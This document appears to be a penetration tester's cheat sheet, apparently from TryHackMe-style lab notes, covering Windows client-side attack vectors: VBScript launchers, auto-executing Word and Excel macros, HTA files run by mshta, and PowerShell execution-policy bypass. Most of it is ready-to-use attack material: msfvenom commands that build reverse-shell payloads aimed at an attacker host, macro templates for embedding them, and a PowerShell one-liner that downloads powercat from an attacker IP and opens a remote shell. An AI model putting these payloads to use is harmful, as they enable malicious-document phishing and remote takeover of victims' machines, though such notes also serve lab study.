2.2 KiB
2.2 KiB
Windows Scripting Host (WSH)
Visual Basic Script (VB Script)
-
cscript file.exe, command line scripts -
wscript file.exe, UI scripts -
Example (watch out for the whitespace after path, it has to be included)
Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\cmd.exe " & WScript.ScriptFullName),0,True
c:\Windows\System32>wscript /e:VBScript c:\Users\user\Documents\shell.txt
Visual Basic for Application (VBA)
- Access Windows API via Macros
- Open Word,
view-->macros, give a name and select document inMacros in - Create reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f vba
- Insert into the following Macro Content,
Workbook_Open()for excel,Document_Open()for Word macros
Sub Document_Open()
SHELL
End Sub
Sub AutoOpen()
SHELL
End Sub
Sub SHELL()
<reverse shell goes here>
End Sub
HTML Application (HTA)
- HTML file including some kind of scripting language like JS, VB, ActiveX
mshtais used to excecute
POC
- Download file via attacker's web server
- File should look like
<html>
<body>
<script>
var shell= 'cmd.exe'
new ActiveXObject('WScript.Shell').Run(shell);
</script>
</body>
</html>
- Save Document in a macros supporting file format like
Word 97-2003 TemplateandWord 97-2003 Document
Reverse Shell
- Craft reverse shell via
msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4448 -f hta-psh -o shell.hta
msfconsolevia
use exploit/windows/misc/hta_server
Powershell
- Powershell execution policy can be checked via
Get-ExecutionPolicy
- Set policy via
Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
- Bypass via
powershell -ex bypass -File shell.ps1
- Load powercat on attacker machine and load it on the target via
C:\Users\thm\Desktop> powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://<attacker-IP>:8000/powercat.ps1');powercat -c <attacker-IP> -p 4448 -e cmd"
- Or use msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=4447 -f psh -o payload.ps1